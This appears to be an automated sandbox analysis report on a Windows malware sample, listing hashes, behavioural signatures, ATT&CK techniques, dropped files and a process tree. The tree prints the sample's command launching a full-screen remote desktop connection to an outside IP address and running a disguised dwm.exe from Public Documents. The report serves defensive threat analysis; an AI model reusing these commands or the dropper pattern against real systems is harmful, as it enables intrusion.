Overview

overview

10

Static

static

1720e833db...36.exe

windows7-x64

10

1720e833db...36.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 20:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe

  • Size

    56KB

  • MD5

    f64ccbc901901c142778923c42a6e582

  • SHA1

    214ec7d3082028bcf42a2f7e86917c2d40b9611b

  • SHA256

    1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136

  • SHA512

    6571b0c2590b9f60b86515a03ca05bbcfbce3d5f01243b91e4870d465439823551ac4129c4fb520215347b96a1a9223faa5aaffceaa0a4fdbe50cdd7a62e08d9

  • SSDEEP

    768:huxJmUepbOSJr8UzFr4DhlWerv1NwF326QI2:hqJtLUzNehlWQ1CM6P

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe
    "C:\Users\Admin\AppData\Local\Temp\1720e833db94e2388213e8dbfd8589819ddc8525295c9e2e6df61c2c6446f136.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\SysWOW64\mstsc.exe
      mstsc.exe /v:122.128.123.178:3389 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4044
      • C:\Windows\system32\mstsc.exe
        mstsc.exe /v:122.128.123.178:3389 /f
        3⤵
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:808
    • C:\users\Public\documents\dwm.exe
      C://users/Public/documents/dwm.exe
      2⤵
      • Executes dropped EXE
      PID:4968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

Peripheral Device Discovery

2
T1120

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\RDSv1.dll
    Filesize

    24KB

    MD5

    36f3b718deda0cebb65487b2a0b56678

    SHA1

    5a9a0c523641184d2829155100bd875491be1f5a

    SHA256

    2fca90ac0ae35ef4dd9a99451dc4754bcd53c59ba97c121ffd3e62034b1ecefa

    SHA512

    a30fddfe2526673b2eec78eab91b0a0afcf34e061fee4a3202262a830f94205ecd6d89cdb604abd4ae18027cc122ec2bd8495060a810262e6728f7aac2233e5c

    Download Submit
  • C:\Users\Public\Documents\Text.txt
    Filesize

    109KB

    MD5

    81fdb130a76c6315ce98a28e2caea772

    SHA1

    f2965c3571ec298193a02bf7aa126af4faa8b846

    SHA256

    2900531b2df0712e1687ebc17901d5a6d90e8ff2d47650056d748344fc3d467a

    SHA512

    f5e701737121341223caebd1e8ed05a2ef71d2c8f3bce0b673bbd316d928ae3083e8fe2684efa45c5593777f912ab3dac9d3f76a75bda02e5d1d4c64b0d8d04d

    Download Submit
  • C:\Users\Public\Documents\calc.dll
    Filesize

    87KB

    MD5

    225d9c27f41c841980c170d65b4d31dd

    SHA1

    2b1381e305c05660b26dd7c571d9b02df88a3f4d

    SHA256

    0d82363a422c876fae84ca27b2b72ab3286ffdf8a2632350bc64680cb8d36de9

    SHA512

    7eca920d383de3e3440225a5ca5930f130bba1f5155dc37920654493130ae3f3073a1eec731eed1b56355700a18d74cf0901b627226350d4d40224e2e5265966

    Download Submit
  • C:\Users\Public\Documents\dwm.exe
    Filesize

    6KB

    MD5

    68288c9c86bcd4dbad9f93294926b29b

    SHA1

    9b177ba5a3d22eaf89cb94b3cacf47b6dcdb4496

    SHA256

    720f10d44aa351453f0cc1fbe463de79e4a6f148bbad369dd1295b1b416b07bc

    SHA512

    48fa5027527d9f139440cb9ef355bca906d654d7b20ad0a98eb89924f12e7fcae0f041afba8c300e62cc79ce6aaf32f4116b88ebd37397c79a873a8ff6942ee6

    Download Submit
  • C:\users\Public\documents\ClassLibrary2.dll
    Filesize

    5KB

    MD5

    ea309f547d484a9506978a64b46e1759

    SHA1

    5487372323411688d34d5137627c1c5d32d42974

    SHA256

    ea02454269f1059e6d9157a1914e60c2f739d5e185801aeb713dc9eafc4ba9d7

    SHA512

    96328f93e81a8a930bb65f9266f0fd700db5e01a9dcc28c37be49df76733d01d74ee2437d3b1fa4d7aa70baf75a7dffc7d598cc8f2ce581aa030dcb23983988f

    Download Submit
  • C:\users\Public\documents\dwm.exe
    Filesize

    6KB

    MD5

    68288c9c86bcd4dbad9f93294926b29b

    SHA1

    9b177ba5a3d22eaf89cb94b3cacf47b6dcdb4496

    SHA256

    720f10d44aa351453f0cc1fbe463de79e4a6f148bbad369dd1295b1b416b07bc

    SHA512

    48fa5027527d9f139440cb9ef355bca906d654d7b20ad0a98eb89924f12e7fcae0f041afba8c300e62cc79ce6aaf32f4116b88ebd37397c79a873a8ff6942ee6

    Download Submit
  • memory/808-133-0x0000000000000000-mapping.dmp
    Download
  • memory/4044-132-0x0000000000000000-mapping.dmp
    Download
  • memory/4968-138-0x00000254720D0000-0x00000254720D6000-memory.dmp
    Filesize

    24KB

    Download
  • memory/4968-141-0x00000254724B0000-0x00000254724B8000-memory.dmp
    Filesize

    32KB

    Download
  • memory/4968-139-0x00007FFD0F580000-0x00007FFD10041000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4968-143-0x00000254724E0000-0x00000254724F5000-memory.dmp
    Filesize

    84KB

    Download
  • memory/4968-135-0x0000000000000000-mapping.dmp
    Download
  • memory/4968-145-0x00007FFD0F580000-0x00007FFD10041000-memory.dmp
    Filesize

    10.8MB

    Download